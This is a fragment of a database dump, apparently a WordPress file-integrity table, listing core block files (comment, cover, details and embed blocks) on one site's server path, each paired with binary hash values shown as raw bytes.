('xaî„KP9þÐjÅ	Ö', 'wp-includes/blocks/comment-date/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-date/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨·jÀÜ«Uï‘7¼…ê0ty', 'å#£¹¿&‰#0õŠMu×ŒSÉÃ³Gæœ»êÆgÐu¥~', '', 0, '?'),
('3\ZÇ-Ò’ˆÃ€,já', 'wp-includes/blocks/comment-date.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-date.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'RêÀ»ßŽÑxîŸdú¨7ñM', '“J‘ÔtÑs>A¦´û\nNÂmà¯K@|£p&k¬YšN]', '', 0, '?'),
('’œ^¢	§"˜uZÙS ', 'wp-includes/blocks/comment-edit-link/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-edit-link/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\nÜ°ÛÖE\Z£ ÛÚúÇV', 'EŠñ	0ÏXO3óSy{\rYÚ™µŽ''œ!,×ù+ìÆƒ', '', 0, '?'),
('Í2>ÊÝ:mz=	6Ù£;', 'wp-includes/blocks/comment-edit-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-edit-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';›Û×[“ä‰õ­\Zz', 'O5%ìêÀ˜W/ôÈj(_\nú4\ZtQÜëÀq@n­', '', 0, '?'),
('­ä‚VÜ¤½cýQ›•''ù3', 'wp-includes/blocks/comment-reply-link/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-reply-link/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§!îTÝ–…F.¿	‰B', 'Ë€-e''‡i½ÃZCŽ[ÊKLWn›€ÅAÞÒ®Ï6€ôÆ', '', 0, '?'),
('õŽ)Q\n“?ñO©aŒr¤¢', 'wp-includes/blocks/comment-reply-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-reply-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{®o>ŠiºpVzÌ,Ý', '*E®Hr9`ž7ñ–f˜§˜æRMcÊ—ÑiaÇâÕVhª¦', '', 0, '?'),
('+\Z#(µøÖÆ’†çv®ŽÖ', 'wp-includes/blocks/comment-template/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pFµê¢`íÞGÞ~m½ö', 'WGÈŒ{k»–®³h_èfÙWò=³¸}TUìÛ¿ƒ¹', '', 0, '?'),
('‹¡ÕÀ¡©R‡\\‘pËÃÂ”', 'wp-includes/blocks/comment-template/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—:²Ã=µŠ‚B«ÀÉW®', '	`øgu F™$`mó±=Ÿ3ÕÀcÁëc•%K¨ï', '', 0, '?'),
('S!7òY*e4ãJþ‰ÐS', 'wp-includes/blocks/comment-template/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝL0H‹Às$”8Æ"!î', '·Úï÷>GÁàiÉ€dìñ°ìúV¾Î À5µ‹Õuv4', '', 0, '?'),
('uêV­ã‘''jì²\ZðV', 'wp-includes/blocks/comment-template/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T4Ö\\Ç¶w×ç|?5 ds', '5Ôè0zs“”ÔúÅ‚²K«Þ|,Å]!Ñü^glHËè', '', 0, '?'),
('ê"6‚‘ã´-ÊïÌL…', 'wp-includes/blocks/comment-template/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þñ§ 7“R›LÑy\0£ž', 'L~»á|G’½y^¦ÖGžC	ôÇš´Ä%¦mAu', '', 0, '?'),
('Ìa$¿:¹4jç\0º\ZXë', 'wp-includes/blocks/comment-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comment-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'f¼*Üö§Y©Î².ÒÅW', 'ÅôëØþOˆzÕëÕ•VLQ6?{šaK¡qÁñk……', '', 0, '?'),
('©Ð9f7lïûR—±>ÿíP', 'wp-includes/blocks/comments/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†\Z~ÙJKü9Hvâ''^û', 'Êç{U‡iÍ·f€È$Â¯37Q¼éó¥kã;]ëO—', '', 0, '?'),
('ç½6ÄSiïêÇ\rÙ„nTÛ', 'wp-includes/blocks/comments/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êW}I>×•û°Ã”xµâ', '[÷¾†JÈWv)@1q¸IO:‘µDxàë1‚˜3?', '', 0, '?'),
('6à¬Ä@ñ˜VŽÌ/Æ\0', 'wp-includes/blocks/comments/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'u•ÝÀO°!l*ÉO7©¤', 'Š±:ðÿ%[*ó‰HWw‰fOÌCâ÷B‘µà7&X1', '', 0, '?'),
('Ê58L(å9 Ó|¡n''', 'wp-includes/blocks/comments/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡ÏÞ¸2ÑÜ''NÉßó¢Å{', '=ŠÈžýÒ=|k\nmäœÆ<û‹sq^PòìiÇfmŽ', '', 0, '?'),
(',h§Ôõ^ã€+ø_&‘«', 'wp-includes/blocks/comments/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0ÐÔ#¥Ñ\n¬l±ùÒ', '¯vwAðôÖÕ*NÝ`Õ6.¼ai›>\rZ	\04h›}ÎX', '', 0, '?'),
('ßÚeÿƒÛ\n*õÞÜv²', 'wp-includes/blocks/comments/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gß¿>¾Ù\Z¹»Ã=(De', '-0:'' !þoº·6Õ¶î\09ZN	@7µþB¨	Xçv', '', 0, '?'),
('Ä~;$(Ë¸·—pXzµ', 'wp-includes/blocks/comments/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qTÍÖëØaQ÷›\n©Ï!', 'j¥Â›‰‰yä^NtÂPvÞM™pÃûxù¿”tù?.', '', 0, '?'),
('âÙÓÈÍ-P¿F?•:õ', 'wp-includes/blocks/comments/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'e8Öà_©©\Z¿«ê€²', '¯\nôq …C5!ÊÎ|vÖÛ\0+iMÏÔ  K€Öf\\{}', '', 0, '?'),
('î?kbŒ…x÷_Jž£M', 'wp-includes/blocks/comments/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'È|ƒX$Ç‚=ç`¢•¨ž', 'õ¸Ž `}nFW6…6Ú®4bSlÆ"~¼0Ûõ7Ù÷', '', 0, '?'),
('³	”½÷hÜó16"S¦Í', 'wp-includes/blocks/comments-pagination/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',S"\röçW¡\0n¾œo', 'ƒÍ\0°«Wl·3ôº½lsÂ>Ò’ïðÓ½D^*', '', 0, '?'),
('jgXùx¯rTsô‹õÆ¤Ð', 'wp-includes/blocks/comments-pagination/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\nûôPTV”°>0]GäxK', '"GH¢Hë}îÿá*šæõêqÕÔ\\\n-û›õßcž|', '', 0, '?'),
('SVf=ª1_Mwžr>"J\n', 'wp-includes/blocks/comments-pagination/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*n,«éZ~t<4˜’ìAô¦', '	Èx{·]“\n_YÎo\nÃØÏwþÉs{Š-²"EÉ#ªœú', '', 0, '?'),
('ê®”ô‹Õ<¶ËÐ,Zò³', 'wp-includes/blocks/comments-pagination/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÐÂ·ãˆQ2†ö ‹éîy[S', 'r¶Ñr)8JŽÎ eZ\n*Úõ@“`CÒ™kÖ=ã9-vB', '', 0, '?'),
('	vÙg˜§_\r¸ª£ñîzé', 'wp-includes/blocks/comments-pagination/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'e¯êéñ°ÁŸà)FyDù', 'À‹*¥"»‰¼†óeF1‹Üùx‹jŽ³ËÃõtGÊÞ', '', 0, '?'),
('>—Špu™‰L3Ijí^Ôbo', 'wp-includes/blocks/comments-pagination/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"I[Æ/)+Ø%›ý¹Õ¯[', 'rHŽ$Áq!TÅ¾*c\\M¨{»\ZC˜ØfE¨ß˜3LÒè', '', 0, '?'),
('¶%¥WªRäµußÜw', 'wp-includes/blocks/comments-pagination/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\r°äù\ZH¥''ùQ¿Œ', 'Às˜cEŠp9îºo³tˆHÜ›‡÷{6¥s½óUäŽ', '', 0, '?'),
('ý·b#!A¡3XVÚ4	ã™', 'wp-includes/blocks/comments-pagination/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '66E´²LÐ¡jƒ-Ôˆ(±', '`&¯`‘8sBVŒÏC©õaÊ‘¹ÂšÏ!‰•û', '', 0, '?'),
('D`aOû"Y%7‘ñZô£', 'wp-includes/blocks/comments-pagination/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?û×*É±·þ²Ù,”Ì', '}ÁMÌ‹IEŒØNñp–€54]pPåÃ†w>kq!', '', 0, '?'),
('LÖ"ŽèvÅTâŒÌ±Lé', 'wp-includes/blocks/comments-pagination-next/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-next/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘‰Ì…—azßaCå?‚¼', '¡ Ëã¹[ÈCøÉþy9×Š`º''ª#F/J0ÙC”Ý', '', 0, '?'),
('''©ÌN¤8…_¯\n’"÷˜h', 'wp-includes/blocks/comments-pagination-next.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-next.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼fèrt%Kgy»E\r‘{·', '›.\ZÍ»s"1îÚ[©5ÌúÑrˆ§f"øwíwW', '', 0, '?'),
(')½Ï3 øC2‚Žb¨.', 'wp-includes/blocks/comments-pagination-numbers/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ç›A§1PÃºF.O;ê', '«…BÅÃDuï²jœKÙ	Ç û-›>^Â©\rùr¬', '', 0, '?'),
('¤ßz_	t\\a±µÎæòrg', 'wp-includes/blocks/comments-pagination-numbers/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'c²PÆude±OÞ•Å«ú’o', '6iO¥É­w¿“X©‘GVáŸ9Ö5¶Å-I½ÞüZ', '', 0, '?'),
('Ðü!Z¹&kAyXýÛáŸ)', 'wp-includes/blocks/comments-pagination-numbers/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'aOYcÍ*C)ë‚ˆž†%Ê', 'æ©û~Ð$;V|¸´&8˜¤mpÈ›âÓhŽ¼¾>›î', '', 0, '?'),
('ôþÕCFC¾T/Ú®+:`', 'wp-includes/blocks/comments-pagination-numbers/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þ\r¤…1ŽAh$‡RøYš', 'Áà6=+B£ú‚«±ÅØë²)/˜UA–½Ñà­Szïù', '', 0, '?'),
('~\Z—?Oêå«tÎY¶1àÖ', 'wp-includes/blocks/comments-pagination-numbers/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò¢ÊŸÁ‰ÐÏ;þVkn4', 'Lcß½4!BÄ¢:[½þZ³î¥Ë™\r½éQ›òy¨', '', 0, '?'),
('ñÒ3PdoÓ,Ãt¼êÅ', 'wp-includes/blocks/comments-pagination-numbers.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-numbers.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô+Ú6<©†Øáì''Ž©£', '%›Á.xƒšYüavÒw\raŒŽ½i›híi[F', '', 0, '?'),
('råônz\0`Š]–eÒ#+t', 'wp-includes/blocks/comments-pagination-previous/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-previous/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#–nq–6ÏŸ\\ô€°ç', '\0õeÓ''“a ¯ö2¦¾AÝì=Fd]0—•$f*èd@', '', 0, '?'),
('1aø‡¡û´ºŠ™þ?Ùl', 'wp-includes/blocks/comments-pagination-previous.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination-previous.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o-³L5óV sñÉG÷W\0', 'ÅºL\nà}EÏŒ†©twÀLÐž''3c''÷b§', '', 0, '?'),
('ázIÊ³T=½ÁsaÔ', 'wp-includes/blocks/comments-pagination.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-pagination.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÑPÙ)9K\08D*µ“½uô\Z', 'ö)ïÏp<ÒÔmç÷¡¹T`?R¥­ó&d¯Á+d', '', 0, '?'),
('›¤ù¸³„Â­{Áe', 'wp-includes/blocks/comments-title/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bB}\n[~ÞGr¨Û°À§', '¦èšª}ŽøF¥éVõ{Ì—¾€³ÿðpümŸ¼3(', '', 0, '?'),
('ëœØL¡¥¹ÈMƒÓù', 'wp-includes/blocks/comments-title/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ŸeãþúÖG¦AlÄÓ	', 'Æ³Tz‡¼]«¼	•ù‰‚ÍG‰áéb˜ÒgÂû½«', '', 0, '?'),
('æÙ[L2@œ™*»Â‚‚õI§', 'wp-includes/blocks/comments-title/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ß]CÚ!Ñ|AÕJH\0þÊ', 'øžf )˜CÚ¾ŠKGÀ\ZîCž°ÇôÅ¥ L™¹päµ', '', 0, '?'),
('þKXÙ€Ýðïëª2#zÓ', 'wp-includes/blocks/comments-title/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ŸeãþúÖG¦AlÄÓ	', 'Æ³Tz‡¼]«¼	•ù‰‚ÍG‰áéb˜ÒgÂû½«', '', 0, '?'),
('/Ï"CöEÃš7kHƒø', 'wp-includes/blocks/comments-title/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ß]CÚ!Ñ|AÕJH\0þÊ', 'øžf )˜CÚ¾ŠKGÀ\ZîCž°ÇôÅ¥ L™¹päµ', '', 0, '?'),
('ƒœâ¶WÇkVÆ„©±ñÎ', 'wp-includes/blocks/comments-title.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'å“ŠªóÒËÏ¦Qâu:', 'ÏìÑ"ƒsãŒÙe³4Éáó¶7i…íÉÉügöÙ•¥F¿', '', 0, '?'),
('Þ	ÿ¼‰F¼ÝäÝÊE¼¯)', 'wp-includes/blocks/comments.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/comments.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨õ)ò¦“Zé\\0*·S²•1', 'ˆhTñä>×x7Åº\04Êq3§B^†‰ñÜ­–ßÝÏ', '', 0, '?'),
('ofëGkÌL†Á›ù`t@', 'wp-includes/blocks/cover/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8ÎºÜµÏ›Ãq_)K', 'C \Z\\ä¥5¹Í{Ñ}õ°s,E]Ž¸"~öødÍ', '', 0, '?'),
('>¹£Gfè@ÔTáž˜;ƒD‰', 'wp-includes/blocks/cover/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Wå¯µì±]4 |¸°\n¦%', ' !qÁ.a, µ^ë³.3šzÕC"Â“Y<je°QF', '', 0, '?'),
(':Áùs-(B§¢ðOÍ2ˆä)', 'wp-includes/blocks/cover/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ôë«@ŒãáÌˆÊ1ÃÓ', 'sw<¾<m	¯…ÚûÅýbîÞ~\\¢ú‹£ÿ¨üß¶', '', 0, '?'),
('ÆpÌ=Z\0¯S_ÿðÛ$', 'wp-includes/blocks/cover/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡éF¾ŠpÒ ¿‘\\G•“', 'Š„8Ž%ÌŠ»ˆ%ÇÝÜÀÖÜb`•ëÔ\n3mIè°¨BªH', '', 0, '?'),
('%iþÍÞågcaìWÎ!qÐ', 'wp-includes/blocks/cover/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÃH®$¡bŽ§aE<è.', 'e|œ=1™¬.Z8x)”VÁc´ÇÖ¨é*rN«õÊ', '', 0, '?'),
('c¢ÒJîw¡ÍeIO¨Iq', 'wp-includes/blocks/cover/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“Ö’D<³÷Ú]Šz» ', 'äge(õC5M… b“§ÍXE‘ƒÞæðQ›`³åB', '', 0, '?'),
('¶çŠ`bIñ"v4…Nñ', 'wp-includes/blocks/cover/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼#‡)§²3«­ü\\’¹”’', 'õ½œ¬ª$P´Eutm“¡cYfÖ(6Ñæ§±PQiXe', '', 0, '?'),
('¥±áD­TÇ¡“#"Ú1?Ü', 'wp-includes/blocks/cover/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+‘’8KøO”y¥3qÞ', 'A<ŽC¹\0x’yíLâ\rˆìX¦"ÞÖ/äÿ`Do²˜v', '', 0, '?'),
('ˆ" 6Aéø7^äH­', 'wp-includes/blocks/cover/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏÃ9ê¨Y/oäC¦þ7…ò', 'J m{Ä¿²‚kŸhï?¿¨EQZCß)M2øµðÛ¥°', '', 0, '?'),
('§¡ }í¾VœÐIÜÏÜý', 'wp-includes/blocks/cover.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/cover.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|dDÔáƒ¯K…+¡S', '”}cô£àyB…Í¾ÌDØá‹@4{c^¸±š', '', 0, '?'),
('ÿ{®Qwìˆ:	*öÀs', 'wp-includes/blocks/details/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–èEiš@&ÞpŒ3_°²3', '"@šøÒ7Þ[FVÔò£.È£«	¸‰%½è!´Å’', '', 0, '?'),
('B–¯y$Ccáiñ8+šg!', 'wp-includes/blocks/details/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z¦ƒ$U¾p¹Ó=', 'h÷ÑD0Dc­Ìï»ErCQ¦’6&0¾V¦Lf°|Ñ™\r', '', 0, '?'),
('Ó(EhLf|Ð‚ù»ñ¶~', 'wp-includes/blocks/details/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™2Gàaä F²!P^', '#_*ËÙ%)Ÿ&kÂÂ;ÿ¦â]V‘±~ì½zo', '', 0, '?'),
('~ÆÌÌÀô©\nŸ“''ÍÝ$ú<', 'wp-includes/blocks/details/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z¦ƒ$U¾p¹Ó=', 'h÷ÑD0Dc­Ìï»ErCQ¦’6&0¾V¦Lf°|Ñ™\r', '', 0, '?'),
('Ñ	B~m9»bnb›Å‡`=', 'wp-includes/blocks/details/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™2Gàaä F²!P^', '#_*ËÙ%)Ÿ&kÂÂ;ÿ¦â]V‘±~ì½zo', '', 0, '?'),
('ðS§Þ9QeÒÆI¼3Ê', 'wp-includes/blocks/details/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²''"€o@ñ$)N·m', '1—ò÷j#IÛïqÿƒNP''šç9ËòEÄ²_%Õ', '', 0, '?'),
('áÜià—4|?¼ü›', 'wp-includes/blocks/details/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»=P''–Ò°ýà¿bÙl9¤', '”bãÐ1¯KÈö­×Åvi×‘/ü¿"´C¤ÍêŠ€', '', 0, '?'),
('õñ­ùì^‚zO5ä<Öê', 'wp-includes/blocks/details/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²''"€o@ñ$)N·m', '1—ò÷j#IÛïqÿƒNP''šç9ËòEÄ²_%Õ', '', 0, '?'),
('G	\n·\Z s¾Æ6ªº\0QB', 'wp-includes/blocks/details/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/details/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»=P''–Ò°ýà¿bÙl9¤', '”bãÐ1¯KÈö­×Åvi×‘/ü¿"´C¤ÍêŠ€', '', 0, '?'),
('!Åë'')¦qM*¦Xc', 'wp-includes/blocks/embed/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Êek:wˆ•ßG)[Î½', '%mÃã†ao§T¹Ø‚LO­ÐéBìšT‘äâA8öí', '', 0, '?'),
(' èáÉ‰:Ésž{1<¶', 'wp-includes/blocks/embed/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q(Š›±º¸‹ÇD;Ù', '‹B\Z|…Lý¬ü$Xí\r²‡Êhd¶^:ÄÁÒ?òOû', '', 0, '?'),
('ø>ÏóI7mª›ñ>–ê£', 'wp-includes/blocks/embed/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§E#ò±úR½GˆCtÒËà¤', '[ê•­8Mø~Ì´žxñWyš³–vÀ|õ‰	ÉÉ\\Î', '', 0, '?'),
('ÿ»æ¸ß¹u7õÀà[)äh', 'wp-includes/blocks/embed/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q(Š›±º¸‹ÇD;Ù', '‹B\Z|…Lý¬ü$Xí\r²‡Êhd¶^:ÄÁÒ?òOû', '', 0, '?'),
('Å†€Ô¡yiÓDâ‚1›', 'wp-includes/blocks/embed/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§E#ò±úR½GˆCtÒËà¤', '[ê•­8Mø~Ì´žxñWyš³–vÀ|õ‰	ÉÉ\\Î', '', 0, '?'),
('uûº²''MÆÂû…2Ã', 'wp-includes/blocks/embed/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èê§.€þLRó¶Ó™B‰>', '9ºh*®Ûæy=Ô,°OÇA·Ì\\Á\Z\0~ðµàÑá_', '', 0, '?'),
('îÎ¯¾Û?ñ¹gW„õ÷9', 'wp-includes/blocks/embed/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nQ‘Xÿ€ho¹W„¡;E', '	cÿÃ\rŒ¿“YÓDµZáŽ‚\\išj¡¦u²+kU%', '', 0, '?'),
('ƒWÜnJÖ.''/xû', 'wp-includes/blocks/embed/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èê§.€þLRó¶Ó™B‰>', '9ºh*®Ûæy=Ô,°OÇA·Ì\\Á\Z\0~ðµàÑá_', '', 0, '?'),
